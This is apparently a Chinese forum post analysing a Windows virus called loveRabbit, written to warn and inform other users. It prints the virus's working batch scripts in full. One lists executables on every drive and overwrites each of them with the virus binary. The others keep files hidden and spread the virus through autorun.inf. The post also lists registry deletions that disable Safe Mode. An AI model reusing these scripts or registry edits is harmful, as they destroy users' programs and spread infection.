这是个行为极其恶劣的病毒
1.破坏安全模式
2.导致系统无法关机 重启 注销
3.直接替换exe文件
4.导致冰刃 sreng SSM等安全工具无法运行
目前所有杀毒软件都还无法查杀
运行文件后:
释放如下文件
C:\WINDOWS\system32\JK.exe
C:\WINDOWS\system32\love.bat
C:\WINDOWS\system32\loveRabbit.bat
C:\WINDOWS\system32\loveRabbit.exe
C:\WINDOWS\system32\msexch400.dll
C:\WINDOWS\system32\Rabbit.exe
C:\WINDOWS\msconfig.inf
C:\WINDOWS\msconfig1.inf
C:\WINDOWS\system32\loveRabbit.exe在进程里有两个 互相监视 不断调用cmd.exe (用以执行C:\WINDOWS\system32\love.bat和C:\WINDOWS\system32\loveRabbit.bat的内容)和attrib.exe
C:\WINDOWS\system32\loveRabbit.bat内容如下
attrib +s +h C:\WINDOWS\system32\msexch400.dll
attrib +s +h d:\Rabbit.exe
attrib +s +h e:\Rabbit.exe
attrib +s +h c:\Rabbit.exe
attrib +s +h f:\Rabbit.exe
attrib +s +h g:\Rabbit.exe
attrib +s +h h:\Rabbit.exe
attrib +s +h e:\AutoRun.inf
attrib +s +h f:\AutoRun.inf
attrib +s +h c:\AutoRun.inf
attrib +s +h d:\AutoRun.inf
attrib +s +h h:\AutoRun.inf
attrib +s +h g:\AutoRun.inf
不断为这些文件加上系统和隐藏属性
C:\WINDOWS\system32\love.bat内容如下
FOR %%a in ( d: e: f: h: g: ) do dir /s/b %%a\*.exe>>c:\windows\msconfig.inf
cd C:\Program Files
dir *.exe /s /b >>c:\windows\msconfig1.inf
FOR /f "delims=" %%i in (c:\windows\msconfig.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
FOR /f "delims=" %%i in (c:\windows\msconfig1.inf) do copy /y "C:\WINDOWS\system32\Rabbit.exe" "%%i"
把d: e: f: g: h:的所有exe文件做一个列表放到c:\windows\msconfig.inf
把C:\Program Files所有exe 做一个列表 放到c:\windows\msconfig1.inf
然后分别用C:\WINDOWS\system32\Rabbit.exe 替换这些exe
每个分区下面释放一个Rabbit.exe和一个autorun.inf
autorun.inf 内容
[autorun]
Label=本地磁盘
Shellexecute=Rabbit.exe
达到双击运行之目的
右键增加 “自动播放”
注册表方面:
增加HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{4bf41072-b2b1-21c1-b5c1-0305f4155515}\StubPath
指向C:\WINDOWS\system32\JK.exe (这项应该导致他的开机启动,本人水平有限,不懂这项注册表,望大家指教)
删除键
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}
删除值
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\ControlSet001\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\: "DiskDrive"
达到破坏安全模式的目的
还有一点是最厉害的,他生成的msexch400.dll插入系统的winlogon 进程,使得winlogon.exe的线程数会不断上升,干扰正常的关机和注销,并在loveRabbit.exe被结束时由winlogon.exe重新启动,注销或者关机;
另外此病毒会破坏冰刃 sreng 的运行(即便将他们改名,我测试时候就是改成了fdfdsfds.bat,可照样被结束,不知道原理还..)
测试病毒时候 SSM也没有任何反映 机器直接卡死
另外 病毒体内留下文字:
I LOVE Rabbit ,and you ? look:http://z8232****.diy.myrice.com/Rabbit.htm (摘自艾玛博客里的分析,感谢)
此病毒行为比较恶劣 不过我想应该是个病毒的雏形或是恶意文件 还没有公开
不过如果被黑客利用来网上挂马或者制作大量变种 后果将不堪设想
因为病毒是替换的文件 而不是感染文件 所以杀毒软件连修复的机会都没有...
中了就直接格吧...
由于本人对于批处理 某些注册表项目不甚了解 所以
分析过程中 轩辕小聪 懒人小G 六翼刺猬 艾玛 正奇等对本人做了指点 在此表示感谢!
附 感染系统后的截图
